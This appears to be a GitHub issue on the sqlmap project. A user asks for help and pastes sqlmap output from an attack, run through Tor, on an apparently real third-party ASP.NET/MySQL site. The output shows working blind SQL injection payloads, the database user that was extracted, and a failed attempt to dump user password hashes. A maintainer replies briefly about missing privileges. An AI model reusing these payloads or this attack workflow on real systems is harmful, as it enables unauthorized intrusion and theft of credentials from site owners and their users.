search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.86k stars 5.66k forks source link

need a help ? #745

Closed redlin3e closed 10 years ago

redlin3e commented 10 years ago 
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
    Payload: id=MAKE_SET(9616=9616,15)

    Type: AND/OR time-based blind
    Title: MySQL time-based blind - Parameter replace (bool*int)
    Payload: id=(8507=8507)*SLEEP(25)

---
[01:16:18] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:16:18] [INFO] testing MySQL
[01:16:18] [INFO] confirming MySQL
[01:16:18] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL >= 5.0.0
[01:16:18] [INFO] fetching current user
[01:16:18] [INFO] retrieving the length of query output
[01:16:18] [INFO] resumed: 18
[01:16:18] [INFO] resumed: baroody@%
current user:    'baroody@%'
[01:16:18] [INFO] fetching database users password hashes
[01:16:18] [INFO] fetching database users
[01:16:18] [INFO] fetching number of database users
[01:16:18] [INFO] resumed: 1
[01:16:18] [INFO] retrieving the length of query output
[01:16:23] [INFO] retrieved:   
[01:16:35] [INFO] retrieved:   
[01:16:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[01:16:35] [WARNING] it's highly recommended to avoid usage of switch '--tor' for time-based injections because of its high latency time                                 
[01:16:35] [WARNING] time-based comparison requires larger statistical model, please wait.......................
[01:17:12] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:17:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[01:17:18] [INFO] retrieved:   
[01:17:18] [ERROR] unable to retrieve the database users
[01:17:18] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table)
[01:17:18] [INFO] fetched data logged to text files under '/home/b0x/.sqlmap/output/website.com'

[*] shutting down at 01:17:18
stamparm commented 10 years ago 
most probably because the session user has no read privileges over the relevant system database table